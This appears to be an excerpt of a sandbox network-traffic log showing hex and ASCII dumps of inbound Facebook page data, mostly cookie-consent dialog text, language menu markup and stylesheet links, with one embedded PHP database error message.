2022-10-07 13:59:25 UTC	701	IN	Data Raw: 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 69 61 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 69 5f 49 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 Data Ascii: e":"ar_AR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_o_ia"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":false,"c
2022-10-07 13:59:25 UTC	703	IN	Data Raw: 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 64 71 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 76 51 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 Data Ascii: ":"ko_KR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_v_dq"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_vQ","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57
2022-10-07 13:59:25 UTC	703	IN	Data Raw: 36 34 36 63 0d 0a 4e 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 67 6e 6f 72 65 46 69 78 65 64 54 6f 70 49 6e 53 68 6f 72 74 56 69 65 77 70 6f 72 74 22 3a 66 61 6c 73 65 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 62 65 6c 6c 65 64 42 79 22 3a 22 6d 61 6e 61 67 65 5f 63 6f 6f 6b 69 65 73 5f 74 69 74 6c 65 22 2c 22 68 65 69 67 68 74 22 3a 35 31 38 2c 22 6d 6f 64 61 6c 22 3a 74 72 75 65 2c 22 78 75 69 22 3a 74 72 75 65 2c 22 61 64 64 65 64 42 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 Data Ascii: 646cN","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPosition":null,"ignoreFixedTopInShortViewport":false,"label":null,"labelledBy":"manage_cookies_title","height":518,"modal":true,"xui":true,"addedBehaviors":[{"__m":"
2022-10-07 13:59:25 UTC	705	IN	Data Raw: 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 5c 22 66 61 6c 73 65 5c 22 20 72 65 6c 3d 5c 22 74 6f 67 67 6c 65 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 38 5f 36 61 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 2d 78 65 20 5f 33 2d 38 5f 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 61 62 35 33 34 34 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c Data Ascii: _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\" aria-expanded=\"false\" rel=\"toggle\" id=\"u_0_8_6a\">\u003Cspan class=\"_-xe _3-8_\">\u003Ci class=\"img sp_2myvABqqKqq sx_ab5344\">\u003C\/i>\u003C\/span>\
2022-10-07 13:59:25 UTC	706	IN	Data Raw: 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 33 5c 22 3e 59 6f 75 20 63 61 6e 20 61 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 61 6c 6c 20 63 6f 6f 6b 69 65 73 2c 20 6a 75 73 74 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 20 6f 72 20 79 6f 75 20 63 61 6e 20 63 68 6f 6f 73 65 20 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 20 62 65 6c 6f 77 2e 20 59 6f 75 20 63 61 6e 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 68 6f 77 20 77 65 20 75 73 65 20 74 68 65 6d 2c 20 61 6e 64 20 72 65 76 69 65 77 20 6f 72 20 63 68 61 6e 67 65 20 Data Ascii: Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about cookies and how we use them, and review or change
2022-10-07 13:59:25 UTC	707	IN	Data Raw: 5f 39 6f 2d 6d 5c 22 3e 54 6f 20 73 68 6f 77 20 79 6f 75 20 62 65 74 74 65 72 20 61 64 73 2c 20 77 65 20 75 73 65 20 64 61 74 61 20 74 68 61 74 20 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 6e 65 72 73 20 70 72 6f 76 69 64 65 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6f 66 66 20 46 61 63 65 62 6f 6f 6b 20 43 6f 6d 70 61 6e 79 20 50 72 6f 64 75 63 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 73 69 74 65 73 20 61 6e 64 20 61 70 70 73 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 77 68 65 74 68 65 72 20 77 65 20 75 73 65 20 74 68 69 73 20 64 61 74 61 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 Data Ascii: _9o-m\">To show you better ads, we use data that advertisers and other partners provide us about your activity off Facebook Company Products, including websites and apps. You can control whether we use this data to show you ads in your \u003Ca href=\"http
2022-10-07 13:59:25 UTC	709	IN	Data Raw: 77 69 74 68 20 75 73 2e 20 54 68 69 73 20 68 65 6c 70 73 20 75 73 20 64 6f 20 74 68 69 6e 67 73 20 73 75 63 68 20 61 73 20 67 69 76 65 20 79 6f 75 20 61 20 6d 6f 72 65 20 70 65 72 73 6f 6e 61 6c 69 7a 65 64 20 65 78 70 65 72 69 65 6e 63 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 30 37 32 35 36 36 39 36 31 38 32 36 32 37 5c 22 3e 6f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 68 6f 77 20 77 65 20 75 73 65 20 69 74 2c 20 61 6e 64 20 68 6f 77 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 69 74 2e 5c 75 Data Ascii: with us. This helps us do things such as give you a more personalized experience on Facebook. Learn more about \u003Ca href=\"https:\/\/www.facebook.com\/help\/2207256696182627\">off-Facebook activity\u003C\/a>, how we use it, and how you can manage it.\u
2022-10-07 13:59:25 UTC	710	IN	Data Raw: 7a 67 5f 73 51 76 64 37 50 58 34 76 36 47 4f 4f 53 45 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 43 61 6e 61 64 61 20 6f 72 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 79 6f 75 72 6f 6e 6c 69 6e 65 63 68 6f 69 63 65 73 2e 63 6f 6d 5c 75 30 30 Data Ascii: zg_sQvd7PX4v6GOOSEw\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Digital Advertising Alliance of Canada\u003C\/a> in Canada or the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00
2022-10-07 13:59:25 UTC	712	IN	Data Raw: 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 33 61 53 48 35 66 4f 75 2d 6b 52 7a 77 6c 56 56 51 59 39 73 65 74 4a 45 59 58 74 4c 74 55 34 70 37 56 36 62 34 33 44 6e 52 70 4f 6d 53 30 30 36 6f 55 71 68 50 71 38 4e 6e 46 6b 54 46 37 37 51 4f 74 49 72 70 31 43 64 4a 48 6f 6d 74 6d 64 66 4f 30 75 39 37 63 65 49 4b 35 32 43 4c 50 4e 6d 72 30 50 43 73 37 68 37 6b 50 4c 59 63 5a 51 6c 70 4e 46 62 2d 41 55 47 34 72 30 56 4a 67 6d 48 78 69 66 35 38 66 4c 34 56 66 69 68 32 6d 67 66 5a 5f 74 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 Data Ascii: p?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&h=AT3aSH5fOu-kRzwlVVQY9setJEYXtLtU4p7V6b43DnRpOmS006oUqhPq8NnFkTF77QOtIrp1CdJHomtmdfO0u97ceIK52CLPNmr0PCs7h7kPLYcZQlpNFb-AUG4r0VJgmHxif58fL4Vfih2mgfZ_tg\" target=\"_blank\" rel=\"nofollow\" dat
2022-10-07 13:59:25 UTC	713	IN	Data Raw: 20 61 6e 79 20 74 69 6d 65 2e 20 41 73 20 6f 66 20 35 20 4f 63 74 6f 62 65 72 20 32 30 32 30 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 20 6f 66 66 65 72 65 64 20 62 79 20 70 6f 70 75 6c 61 72 20 62 72 6f 77 73 65 72 73 20 61 74 20 74 68 65 20 6c 69 6e 6b 73 20 62 65 6c 6f 77 2e 20 43 65 72 74 61 69 6e 20 70 61 72 74 73 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 20 6d 61 79 20 6e 6f 74 20 77 6f 72 6b 20 70 72 6f 70 65 72 6c 79 20 69 66 20 79 6f 75 20 68 61 76 65 20 64 69 73 61 62 6c 65 64 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 2e 20 50 6c 65 61 73 65 20 62 65 20 61 77 61 72 65 20 74 68 61 74 20 74 68 65 Data Ascii: any time. As of 5 October 2020, you may find additional information about the controls offered by popular browsers at the links below. Certain parts of Facebook Products may not work properly if you have disabled browser cookies. Please be aware that the
2022-10-07 13:59:25 UTC	715	IN	Data Raw: 7a 61 78 55 47 6e 73 43 38 4f 72 6f 30 4a 77 45 6b 37 45 6d 4d 66 64 42 64 79 66 77 65 4d 52 72 77 67 54 62 35 35 30 6f 55 65 30 56 56 32 76 46 6d 4b 66 7a 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 46 69 72 65 66 6f 78 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 Data Ascii: zaxUGnsC8Oro0JwEk7EmMfdBdyfweMRrwgTb550oUe0VV2vFmKfzg\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Firefox\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252
2022-10-07 13:59:25 UTC	716	IN	Data Raw: 75 30 30 33 43 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 5c 22 31 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 39 78 6f 36 20 5f 34 6a 79 33 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 5c 22 20 64 61 74 61 2d 63 6f 6f 6b 69 65 62 61 6e 6e 65 72 3d 5c 22 61 63 63 65 70 74 5f 6f 6e 6c 79 5f 65 73 73 65 6e 74 69 61 6c 5f 62 75 74 74 6f 6e 5c 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 5c 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 2d 61 63 63 65 70 74 2d 62 75 74 74 6f 6e 5c 22 20 74 69 74 6c 65 3d 5c 22 4f 6e 6c 79 20 61 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 22 20 74 79 70 65 3d 5c 22 73 75 62 6d 69 74 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 6e Data Ascii: u003Cbutton value=\"1\" class=\"_42ft _4jy0 _9xo6 _4jy3 _4jy1 selected _51sy\" data-cookiebanner=\"accept_only_essential_button\" data-testid=\"cookie-policy-manage-dialog-accept-button\" title=\"Only allow essential cookies\" type=\"submit\" id=\"u_0_c_n
2022-10-07 13:59:25 UTC	718	IN	Data Raw: 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 50 6f 72 74 75 67 61 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 39 43 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 52 6f 6d 5c 75 30 30 65 32 6e 5c 75 30 31 30 33 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 53 42 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 53 75 6f 6d 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 37 63 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 53 76 65 6e 73 6b 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 44 7a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 54 69 5c 75 31 65 62 66 6e 67 20 56 69 5c 75 31 65 63 37 74 22 Data Ascii: "Portugu\u00eas (Portugal)"},1],["__markup_3310c079_0_f_9C",{"__html":"Rom\u00e2n\u0103"},1],["__markup_3310c079_0_g_SB",{"__html":"Suomi"},1],["__markup_3310c079_0_h_7c",{"__html":"Svenska"},1],["__markup_3310c079_0_i_Dz",{"__html":"Ti\u1ebfng Vi\u1ec7t"
2022-10-07 13:59:25 UTC	719	IN	Data Raw: 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 54 77 22 2c 22 75 5f 30 5f 34 5f 42 36 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 73 54 22 2c 22 75 5f 30 5f 35 5f 38 70 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 32 4c 22 2c 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 65 39 34 64 64 38 5f 30 5f 30 5f 5a 2b 22 2c 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 35 4b 22 2c 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 4e 63 22 2c 22 63 6f 6e 74 65 6e 74 22 2c 31 5d 2c 5b 22 Data Ascii: m_f46f4946_0_1_Tw","u_0_4_B6",1],["__elem_a588f507_0_1_sT","u_0_5_8p",1],["__elem_9f5fac15_0_0_2L","pagelet_bluebar",1],["__elem_45e94dd8_0_0_Z+","pagelet_bluebar",1],["__elem_a588f507_0_0_5K","globalContainer",2],["__elem_a588f507_0_2_Nc","content",1],["
2022-10-07 13:59:25 UTC	721	IN	Data Raw: 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 27 64 62 6e 65 77 30 31 27 5c 75 30 30 34 30 27 6c 6f 63 61 6c 68 6f 73 74 27 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 Data Ascii: 53E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/d
2022-10-07 13:59:25 UTC	722	IN	Data Raw: 31 6f 22 7d 2c 22 65 6e 5f 55 53 22 2c 74 72 75 65 2c 22 46 61 63 65 62 6f 6f 6b 22 5d 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 54 5a 22 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 55 73 65 53 69 6e 67 6c 65 4c 65 76 65 6c 4d 61 6e 61 67 65 44 69 61 6c 6f 67 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 54 5a 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 78 36 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 32 50 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 54 5a 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 78 36 Data Ascii: 1o"},"en_US",true,"Facebook"]],["__inst_ead1e565_0_0_TZ"],["WebCookieUseSingleLevelManageDialogController","init",["__inst_ead1e565_0_0_TZ","__elem_45d73b5d_0_0_x6","__elem_45d73b5d_0_1_2P"],[{"__m":"__inst_ead1e565_0_0_TZ"},{"__m":"__elem_45d73b5d_0_0_x6
2022-10-07 13:59:25 UTC	724	IN	Data Raw: 5f 34 5f 43 51 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 43 51 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 46 56 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 46 56 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 36 5f 73 5a 22 5d Data Ascii: _4_CQ"],[{"__m":"__elem_a588f507_0_4_CQ"},"_9ngb","._9nga","._9ngd","._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_5_FV"],[{"__m":"__elem_a588f507_0_5_FV"},"_9ngb","._9nga","._9ngd","._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_6_sZ"]
2022-10-07 13:59:25 UTC	725	IN	Data Raw: 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 38 2f 6c 2f 30 2c 63 72 6f 73 73 2f 4c 45 6a 45 58 2d 72 44 5a 57 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6a 2f 6c 2f 30 2c 63 72 6f 73 73 2f 4a 52 57 79 76 46 38 2d 51 4c 64 2e 63 73 73 3f 5f Data Ascii: c_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/l/0,cross/LEjEX-rDZWf.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yj/l/0,cross/JRWyvF8-QLd.css?_
2022-10-07 13:59:25 UTC	727	IN	Data Raw: 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4c 2f 6c 2f 30 2c 63 72 6f 73 73 2f 6c 49 7a 4c 43 52 77 72 5f 4c 42 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 71 2f 6c 2f 30 2c 63 72 6f 73 73 2f 57 36 78 51 76 67 4c 6b 70 38 35 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 Data Ascii: s="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/0,cross/lIzLCRwr_LB.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0,cross/W6xQvgLkp85.css?_nc_x=Ij3Wp8lg5Kz"
